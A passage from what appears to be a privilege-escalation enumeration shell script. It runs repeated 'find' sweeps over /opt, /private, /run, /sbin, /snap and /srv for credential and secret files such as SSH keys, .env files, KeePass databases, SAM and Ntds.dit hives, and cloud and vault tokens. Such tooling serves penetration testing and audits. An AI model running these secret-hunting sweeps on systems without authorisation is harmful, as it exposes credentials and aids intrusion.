\"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"sess_*\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_OPT=`eval_bckgrd "find /opt -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_PRIVATE=`eval_bckgrd "find /private -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"sess_*\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"agent*\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_RUN=`eval_bckgrd "find /run -name \"*.socket\" -o -name \"*.timer\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SBIN=`eval_bckgrd "find /sbin -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SNAP=`eval_bckgrd "find /snap -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SRV=`eval_bckgrd "find /srv -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name 